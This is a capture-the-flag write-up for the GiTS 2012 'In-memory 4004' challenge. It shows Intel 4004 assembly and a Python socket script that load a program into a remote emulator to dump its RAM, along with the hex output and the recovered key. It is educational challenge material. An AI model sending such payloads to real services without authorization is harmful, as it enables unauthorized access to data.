codezen.fr code hacking, zen coding

29Jan/12Off

GiTS 2012 In-memory 4004 Write-up

In this challenge, we have connect to a service running on port 4004 :

$ nc inmemory.final2012.ghostintheshellcode.com 4004
Written in memory of a great microprocessor.
Waiting for program...
Too slow!
great microprocessor.. port 4004.. waiting for program... Could this be an Intel 4004 emulator ?
Checking the documentation for the Intel 4004 we see it had a 4096 bytes PROM so we send 4096 bytes down the down and indeed:

Written in memory of a great microprocessor
Waiting for program...
Loading program onto PROM...
Executing program...
Cycle limit reached!
Exiting...
In-memory.. so it probably means the key is in the memory of the emulator. We use http://e4004.szyc.org/ a lot to design some code that will scan all the memory and send it to the ROM port.
Intel 4004 code:

init
        LDM 0
        DCL
  FIM R0R1, 0    ; initialize R0=R1=0
  FIM R2R3, 0    ; initialize R2=R3=0
  LDM 12         ; load 12 to accumulator
  XCH R2         ; initialize R2=12
loop1
  SRC R0R1       ; select register & address
        RDM            ; load accumulator from RAM
  WRR            ; write accumulator to ROM port
  ISZ R1, loop1  ; loop 16 times
        ISZ R0, loop1
  ISZ R2, loop1  ; loop 4 times
We use the assembler on the website to get the object code and we send this using a simple python program:

#!/usr/bin/env python

# aXs ^ Big-Daddy

import socket
import sys
import time

if len(sys.argv) != 3:
 print '\nUsage:\t./inmemory.py [host] [port]'
 sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Creating Socket
s.connect((host, port)) # Connecting to socket

data = s.recv(65536)
print 'Received', repr(data)
data = s.recv(65536)
print 'Received', repr(data)

crash = '\xD0\xFD\x20\x00\x22\x00\xDC\xB2\x21\xE9\xE2\x71\x08\x70\x08\x72\x08'

crash += '\x00' * (4096 - len(crash))

s.send('%s' %crash);

while 1:
 line = s.recv(4096)
 if not line:
 break
 print 'Received', repr(line)

s.close()
The emulator was *very* unreliable on the challenge service and you needed to run your like 20 times.
Result:

$ python inmemory.py inmemory.final2012.ghostintheshellcode.com 4004
Received 'Written in memory of a great microprocessor.\n'
Received 'Waiting for program...\n'
Received 'Loading program onto PROM...\n'
Received 'Executing program...\n
500000000000000040000000000000006000000000000000f0000000000000006000000000000000
c0000000000000006000000000000000400000000000000050000000000000009000000000000000
6000000000000000f000000000000000700000000000000050000000000000004000000000000000
9000000000000000500000000000000040000000000000006000000000000000f000000000000000
6000000000000000c000000000000000600000000000000040000000000000005000000000000000
90000000000000006000000000000000f00000000000000070000000000000005000000000000000
40000000000000009000000000000000500000000000000040000000000000006000000000000000
f0000000000000006000000000000000c00000000000000060000000000000004000000000000000
500000000000000090000000000000006000000000000000f0000000000000007000000000000000
50000000000000004000000000000000900000000000000050000000000000004000000000000000
6000000000000000f0000000000000006000000000000000c0000000000000006000000000000000
4000000000000000500000000000000090000000000000006000000000000000f000000000000000
70000000000000005000000000000000400000000000000090000000000000005000000000000000
40000000000000006000000000000000f0000000000000006000000000000000c000000000000000
60000000000000004000000000000000500000000000000090000000000000006000000000000000
f0000000000000007000000000000000500000000000000040000000000000009000000000000000
500000000000000040000000000000006000000000000000f0000000000000006000000000000000
c0000000000000006000000000000000400000000000000050000000000000009000000000000000
6000000000000000f000000000000000700000000000000050000000000000004000000000000000
9000000000000000500000000000000040000000000000006000000000000000f000000000000000
6000000000000000c000000000000000600000000000000040000000000000005000000000000000
90000000000000006000000000000000f00000000000000070000000000000005000000000000000
40000000000000009000000000000000500000000000000040000000000000006000000000000000
f0000000000000006000000000000000c00000000000000060000000000000004000000000000000
500000000000000090000000000000006000000000000000f0000000000000007000000000000000
500000000000000040000000000000009000000000000000
Cycle limit reached!
Exiting...

You need to rerun it with the top LDM changed to 1 so switch to another RAM bank.
The pattern is repeated several times: 546f6c64596f7549546f6c64596f7 = ToldYouI
You keep converting until you have the full key assembled from all the RAM memory regions
Key: ToldYouItWasInMemory
Share

Posted by aXs

Tagged as: Comments Off
Comments (0) Trackbacks (0)

Sorry, the comment form is closed at this time.

Trackbacks are disabled.